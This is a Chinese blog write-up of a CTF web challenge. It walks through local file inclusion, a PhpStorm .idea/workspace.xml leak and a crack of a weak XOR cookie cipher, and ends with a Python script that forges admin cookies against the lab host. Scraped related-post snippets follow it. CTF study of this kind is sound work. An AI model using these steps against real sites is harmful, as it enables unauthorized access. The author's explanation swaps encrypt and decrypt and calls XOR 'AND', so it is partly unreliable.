IgLosvCMbRj2YFQuK7LPx3Mu/4B9aEzlZ/IfWsBP2mXf8Aw1+tcdk/8A+dJQ/ohgXkxbkeEfA07nla3eaMnKiNwM9xWq/0WOLmX/L9aealzP8A0n+VaY+md9iNIYfYVHcx/X603g5ikWik9TKPFflT2DmKwrsOrQ7CnERygpJa8xTqH9nWd9lUV5p8F4hDqA/Y4G4pDE02kagFf1SQGxyZe+rRSvXkU2KuVHErjB7qYjyS2fq9VuAoJxI/Luyaf2cF3q9yttD6TAZ3OFQd5pXMix3NzwDGZXJ88mrf0P8AQnXh24kYt48q2v6zbm/q6eb9HdUm1HpFqGjakwVL+KSz4eyNwTjHtGfZSDTZ5dH1mKWVCHtZx1sZ/dOGHuyKO6T/AN1/tI1Awfdlb8MMdhJUn4k0T02jSPppf8KgcYikbHazIpJ9pq+xZodHapb6rf6Czjqpn/u7HkHG8Tf5lPD/AJqWqChKsCCDgg8wam1sng0ebJ6x9MhZm7SQWUH3KB7KK1nfVXbtkjikfxZo1LH2kk0oVgQZAzmp43HI86FjJzjO1ToOYopD4noqOTh8RS6LlRCE1IMhKCNjWUGDiso2b//Z'></img>

我们通过文件包含,看看index.php里面的内容

url:http://16f8b7fc777444e38af9e234404cec95d069d121e5d7435a.game.ichunqiu.com/index.php?jpg=index.php

返回的是一个坏掉的图片,不碍事,直接看源码,复制下来,删掉划线部分

把剩余base64丢去解码

返回了一段php代码,这段代码中将传入jpg这个变量的参数进行了过滤,只允许大小写字母与数组,否则会被替换成空。

但是还有一个有意思的一点,它将config这个字符替换成了"_"。

但是下一步我们该怎么做?发现注释中有信息说是用PhpStorm写的,我百度了下,它是个类似于eclipse、vs之类的编译器。(我这种不做开发的用个记事本都能写代码23333)

PhpStorm有个问题,它存在于一个.idea的文件

构造我们url访问下.idea/workspace.xml这个文件

http://16f8b7fc777444e38af9e234404cec95d069d121e5d7435a.game.ichunqiu.com/.idea/workspace.xml

发现2个特别的文件,fl3g_ichuqiu.php一看就是flag文件的名字,还有个config.php

我们都访问下config.php没有回显,fl3g_ichuqiu.php显示个 "╮(╯▽╰)╭"这玩意。

用文件包含看看

因为fl3g_ichuqiu.php中的_被替换了,config被替换成_了,所以都无法正常访问。

但是正是因为config被替换成"_",我们可以通过config构造出fl3g_ichuqiu.php

url:

http://16f8b7fc777444e38af9e234404cec95d069d121e5d7435a.game.ichunqiu.com/index.php?jpg=fl3gconfigichuqiu.php

用上面查看index.php相同的方法解码

<?php

/**

 * Created by PhpStorm.

 * Date: 2015/11/16

 * Time: 1:31

 */

error_reporting(E_ALL || ~E_NOTICE);

include('config.php');

function random($length, $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz') {

    $hash = '';

    $max = strlen($chars) - 1;

    for($i = 0; $i < $length; $i++)    {

        $hash .= $chars[mt_rand(0, $max)];

    }

    return $hash;

}

function encrypt($txt,$key){

    for($i=0;$i<strlen($txt);$i++){

        $tmp .= chr(ord($txt[$i])+10);

    }

    $txt = $tmp;

    $rnd=random(4);

    $key=md5($rnd.$key);

    $s=0;

    for($i=0;$i<strlen($txt);$i++){

        if($s == 32) $s = 0;

        $ttmp .= $txt[$i] ^ $key[++$s];

    }

    return base64_encode($rnd.$ttmp);

}

function decrypt($txt,$key){

    $txt=base64_decode($txt);

    $rnd = substr($txt,0,4);

    $txt = substr($txt,4);

    $key=md5($rnd.$key);

    $s=0;

    for($i=0;$i<strlen($txt);$i++){

        if($s == 32) $s = 0;

        $tmp .= $txt[$i]^$key[++$s];

    }

    for($i=0;$i<strlen($tmp);$i++){

        $tmp1 .= chr(ord($tmp[$i])-10);

    }

    return $tmp1;

}

$username = decrypt($_COOKIE['user'],$key);

if ($username == 'system'){

    echo $flag;

}else{

    setcookie('user',encrypt('guest',$key));

    echo "鈺�(鈺柦鈺�)鈺�";

}

?>

结果是一段如何加密的代码,这里确定flag就在config.php的$flag这个变量里面。

要输出flag则需要让加密后的username == 'system'就行了

random()函数是创建随机字母的

decrypt($txt, $key)是用key对$txt进行加密

encrypt($txt, $key)是用key对$txt进行解密

这里加密和解密的操作是用的位与运算,那么存在一个方法比如

A = C ^ B

那么

C = A ^ B

所以我们可以通过解密函数来求出key的前5位,最后一位通过爆破即可。我们知道key的值了,再与cookie内的user进行加密构造成system即可

我们从插件里面拿到本次Cookie的组成结构,值不一样无所谓,只要位数和字符范围相同就行。

写出python脚本

import base64

import requests

import string

crypt = 'Y0o1dUJLC01N'

text = 'guest'

crypt = base64.b64decode(crypt)

rnd = crypt[0:4]

crypt = crypt[4:] 

tmp = ''

for i in range(5):

    tmp += chr(ord(text[i]) + 10)

key = ''

for i in range(5):

    key += chr(ord(tmp[i]) ^ ord(crypt[i]))

#至此获得此次加密后的key前5位的值,接下来我们要用key来对system进行解密

cookies = []

system = 'system'

tt = ''

for i in range(6):

    tt += chr(ord(system[i]) + 10)

for i in '0123456789abcdef':        #这里为啥是"1-f",因为md5最终返回的数值是16进制对应的字符是0~9 a~f,所以这里范围为这一段

    true_key = key + i

    tmp = ''

    for i in range(6):

        tmp += chr(ord(true_key[i]) ^ ord(tt[i]))

    cookies.append(base64.b64encode(rnd + tmp))

for i in cookies:

    cookie = {'user' : i}

    r = requests.session()

    result = r.get('http://16f8b7fc777444e38af9e234404cec95d069d121e5d7435a.game.ichunqiu.com/fl3g_ichuqiu.php', cookies = cookie)

    print result.text

如果你要用上面的脚本,把注释给删了,我不知道为啥有这个注释会报错。。。。

运行结果

发现flag,不知道为啥在i春秋上提交一直报错,难道这是个假flag(笑)

作者的小唠叨:原来看别人的writeup一有有python脚本的就直接用别人的脚本了,这次硬着头皮看完代码,写写自己的收获。对于这到题,我们知道MD5加密是产生32位 0~f 的组合的,这也是为什么在爆破最后一位的时候范围那是16个字符。其次我们是根据这次拿到的cookie中的user去推MD5加过密的key的前5位,key总共有32位。然后用key的前5位加1位爆破去对system解密的内容,而我们的rnd在这里就是user值的前4位是系统随机生成的,但是我们的key的MD5值和它又是有关联的,在最后也要把rnd和解密后的值拼接在一起。

“百度杯”CTF比赛 九月场 code的更多相关文章

  1. “百度杯”CTF比赛 九月场_YeserCMS

    题目在i春秋ctf大本营 题目的提示并没有什么卵用,打开链接发现其实是easycms,百度可以查到许多通用漏洞 这里我利用的是无限报错注入 访问url/celive/live/header.php,直 ...

  2. “百度杯”CTF比赛 九月场_Test(海洋cms前台getshell)

    题目在i春秋ctf训练营 又是一道cms的通用漏洞的题,直接去百度查看通用漏洞 这里我使用的是以下这个漏洞: 海洋CMS V6.28代码执行0day 按照给出的payload,直接访问url+/sea ...

  3. “百度杯”CTF比赛 九月场_123(文件备份,爆破,上传)

    题目在i春秋ctf训练营 翻看源码,发现提示: 打开user.php,页面一片空白,参考大佬的博客才知道可能会存在user.php.bak的备份文件,下载该文件可以得到用户名列表 拿去burp爆破: ...

  4. “百度杯”CTF比赛 九月场_SQLi

    题目在i春秋ctf大本营 看网页源码提示: 这边是个大坑,访问login.php发现根本不存在注入点,看了wp才知道注入点在l0gin.php 尝试order by语句,发现3的时候页面发生变化,说明 ...

  5. “百度杯”CTF比赛 九月场_SQL

    题目在i春秋ctf大本营 题目一开始就提醒我们是注入,查看源码还给出了查询语句 输入测试语句发现服务器端做了过滤,一些语句被过滤了 试了一下/**/.+都不行,后来才发现可以用<>绕过 接 ...

  6. “百度杯”CTF比赛 九月场_再见CMS(齐博cms)

    题目在i春秋ctf大本营 又是一道cms的题,打开御剑一通乱扫,发现后台登录地址,访问一看妥妥的齐博cms 记得以前很久以前利用一个注入通用漏洞,这里我贴上链接,里面有原理与利用方法详细说明: 齐博c ...

  7. “百度杯”CTF比赛 九月场_Code(PhpStorm)

    题目在i春秋ctf大本营 打开链接是一张图片,审查元素发现关键词base64,图片的内容都以base64加密后的形式呈现,查看url形式,应该是一个文件读取的漏洞 这里我们可以采用url/index. ...

  8. 从零开始学安全(三十四)●百度杯 ctf比赛 九月场 sqli

    先扫后台发现 两个可疑登录界面 l0gin.php login.php 猜测是第一个 用bp 抓包发现 index.php 中间有302 重定向 头文件 里面有一个 page=l0gin.php 应该 ...

  9. 百度杯”CTF比赛 九月场 123

    进去后让登录,先看源码有提示 进到user.php 后发现是空的,看了wp才知道,有bak 下载下来直接爆破 但是那个1990是蛮骚的 直接进去登录 登录成功后是空的,走fd看看是怎么过 的 改包然后 ...

随机推荐

  1. 在Linux中将脚本做成系统服务

    有一些情况下,我们需要将某些脚本作为系统服务来运行.比如,在我使用workerman框架开发php程序时,需要使用管理员权限来运行,而且需要开机自行启动程序提供服务.这个时候将启动程序写成服务就可以很 ...

  2. 基于CMS的组件复用实践

    目前前端项目大多基于Vue.React.Angular等框架来实现,这一类框架都有一个明显的特点:基于模块化以及组件化思维.所以,开发者在使用上述框架时,实际上是在写一个一个的组件,并且组件与组件之间 ...

  3. python爬虫 scrapy2_初窥Scrapy

    sklearn实战-乳腺癌细胞数据挖掘 https://study.163.com/course/introduction.htm?courseId=1005269003&utm_campai ...

  4. javascript 简单工厂模式

    var Bicycle = new Interface("Bicycle",["assemble","wash","ride&qu ...

  5. JavaScript编写风格指南 (二)

    七:注释 // 频繁的使用注释有助于他人理解你的代码// 1.代码晦涩难懂// 2.可能被误认为是错误的代码// 3.必要但不明显的针对特定浏览器的代码// 4.对于对象,方法或者属性,生成文档是有必 ...

  6. python3之模块random随机数

    1.random.random() 随机生成一个大于0小于1的随机数. print(random.random()) 0.03064765450719098 2.random.uniform(a,b) ...

  7. BAT获取FTP指定文件

    以下两个文件放在同一目录下 getfile.bat文件内容如下: @echo offftp.exe -i -s:getfile.txt 192.168.1.2(更换成你的ip,参数之间有空格)paus ...

  8. PHP URL中包含中文,查看时提示404

    使用Microsoft Web Platform在IIS里配置安装一个wordpress,一切顺利. 当添加一片文章时,自动生成URL类似如下: http://localhost/wordpress/ ...

  9. 一个无锁消息队列引发的血案(六)——RingQueue(中) 休眠的艺术 [续]

    目录 (一)起因 (二)混合自旋锁 (三)q3.h 与 RingBuffer (四)RingQueue(上) 自旋锁 (五)RingQueue(中) 休眠的艺术 (六)RingQueue(中) 休眠的 ...

  10. Java继承关系概述

    Java中只支持单继承关系 示例代码: package com.java1995; public class People { private String name; private int age ...